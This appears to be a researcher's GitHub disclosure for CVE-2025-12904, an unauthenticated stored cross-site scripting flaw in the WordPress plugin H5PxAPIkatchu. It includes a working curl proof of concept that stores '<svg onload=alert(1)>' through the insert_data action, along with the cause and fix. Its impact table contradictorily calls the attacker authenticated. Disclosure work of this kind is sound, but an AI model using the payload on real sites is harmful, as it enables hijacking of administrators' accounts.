# SNORDIAN's-H5PxAPIkatchu-CVE-Report
Disclosure for CVE-2025-12904

# CVE-2025-12904 - Vulnerability in SNORDIAN's H5PxAPIkatchu

This repository discloses a vulnerability discovered in [SNORDIAN's H5PxAPIkatchu <= 0.4.16](https://wordpress.org/plugins/h5pxapikatchu/),WordPress plugin developed by otacke.

## 🛠 Affected Version

- **Product**: SNORDIAN's H5PxAPIkatchu
- **Version**: v0.4.16
- **URL**: https://wordpress.org/plugins/h5pxapikatchu/

---

## 🔒 Assigned CVE
| CVE ID            | Type                      | Component                | Impact                    |
|-------------------|---------------------------|--------------------------|---------------------------|
| CVE-2025-12904    |  Unauthenticated Stored Cross-Site Scripting via insert_data                |  class-table-view.php            | Authenticated attacker can execute JS     |  

---

## 🧾 Detailed a Description

### CVE-2025-12904 — Unauthenticated Stored Cross-Site Scripting via insert_data

 - **Affected Component**: h5pxapikatchu admin page
 - **Attack Vector**: Unauthenticated via POST request
 - **Trigger**: An attacker can inject malicious scripts into the admin interface by exploiting the insert_data action to store arbitrary scripts.

```
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
  --data-urlencode 'action=insert_data' \
  --data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'

```
※If the id within the object does not exist, it will fail.

 - **Impact**: Stored scripts may be executed, posing a risk of serious harm such as account hijacking.

## ❓Reason for the vulnerability

The `insert_data()` function did not perform any permission checks, allowing malicious input to be saved without authentication. Furthermore, these entries were displayed unescaped on the administration interface.
 - The `insert_data()` function uses `current_user_can` to prevent unauthorised execution.
 - By using esc_html($value) rather than echo $value, you can prevent XSS execution.

## ひとこと
PoCを作成するのがとても大変だった。
```
--data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'
```
この部分の再現にとても時間を使ってしまった。curlコマンドをもっと使いこなせるようになりたい。
あとこのプラグイン...色々と大丈夫？とくに、名前とか、さ。

 
## 🔍 Discoverer

**Name**: MooseLove  
**Role**: Independent security researcher / bug hunter  
**Contact**: Available upon request  

---

## 📚 References

- Product: https://wordpress.org/plugins/h5pxapikatchu/

---

## ⚠️ License

This advisory is provided for public security awareness. Free to share with attribution.
